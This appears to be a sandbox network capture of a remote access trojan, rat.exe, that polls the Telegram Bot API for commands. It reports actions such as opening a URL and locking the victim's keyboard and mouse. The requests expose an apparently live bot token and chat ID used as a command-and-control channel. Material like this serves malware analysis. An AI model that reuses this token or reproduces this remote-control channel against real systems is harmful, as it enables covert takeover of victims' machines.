https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506668

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506668 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:00 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506669

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506669 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:01 GMT
Content-Type: application/json
Content-Length: 491
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%93%9A%20URL%20opened

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%93%9A%20URL%20opened HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:01 GMT
Content-Type: application/json
Content-Length: 272
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506643

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506643 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:02 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506644

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506644 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:03 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506645

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506645 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:04 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506646

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506646 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:05 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506647

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506647 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:06 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506648

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506648 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:07 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:08 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:10 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:11 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:12 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506653

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506653 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:13 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506654

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506654 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:14 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506655

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506655 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:15 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506656

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506656 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:16 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506657

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506657 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:17 GMT
Content-Type: application/json
Content-Length: 377
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%9A%A7%20Keyboard%20and%20mouse%20locked%20for%206%20seconds

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%9A%A7%20Keyboard%20and%20mouse%20locked%20for%206%20seconds HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:18 GMT
Content-Type: application/json
Content-Length: 301
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506644

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506644 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:19 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506645

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506645 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:20 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506646

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506646 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:21 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506647

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506647 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:22 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506648

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506648 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:23 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%9A%A7%20Keyboard%20and%20mouse%20are%20now%20unlocked

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%9A%A7%20Keyboard%20and%20mouse%20are%20now%20unlocked HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:24 GMT
Content-Type: application/json
Content-Length: 297
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:24 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:25 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:27 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:28 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506653

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506653 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:29 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506654

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506654 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:30 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506655

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506655 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:31 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506656

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506656 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:32 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506657

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506657 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:33 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506658

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506658 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:34 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506659

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506659 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:35 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506660

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506660 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:37 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506661

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506661 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:38 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506662

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506662 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:39 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506663

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506663 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:40 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

